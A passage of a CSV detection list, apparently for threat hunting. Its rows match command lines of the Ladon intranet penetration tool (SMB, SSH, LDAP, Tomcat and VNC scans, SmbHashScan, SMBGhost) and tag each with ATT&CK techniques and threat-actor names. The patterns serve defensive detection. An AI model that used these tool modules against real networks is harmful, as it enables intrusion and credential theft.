OnlineIP*",".{0,1000}Ladon\s.{0,1000}\sOnlineIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. 
plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50687" "*Ladon * OnlinePC*",".{0,1000}Ladon\s.{0,1000}\sOnlinePC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50688" "*Ladon * OsScan*",".{0,1000}Ladon\s.{0,1000}\sOsScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50689" "*Ladon * OxidScan*",".{0,1000}Ladon\s.{0,1000}\sOxidScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50690" "*Ladon *.txt *",".{0,1000}Ladon\s.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50691" "*Ladon *DeBase64*",".{0,1000}Ladon\s.{0,1000}DeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50692" "*Ladon *FtpScan*",".{0,1000}Ladon\s.{0,1000}FtpScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50693" "*Ladon *LdapScan*",".{0,1000}Ladon\s.{0,1000}LdapScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50694" "*Ladon *SMBGhost*",".{0,1000}Ladon\s.{0,1000}SMBGhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50695" "*Ladon *SmbHashScan*",".{0,1000}Ladon\s.{0,1000}SmbHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50696" "*Ladon *SmbScan*",".{0,1000}Ladon\s.{0,1000}SmbScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50697" "*Ladon *SshScan*",".{0,1000}Ladon\s.{0,1000}SshScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50698" "*Ladon *TomcatScan*",".{0,1000}Ladon\s.{0,1000}TomcatScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50699" "*Ladon *VncScan*",".{0,1000}Ladon\s.{0,1000}VncScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50700" "*Ladon *WebScan*",".{0,1000}Ladon\s.{0,1000}WebScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 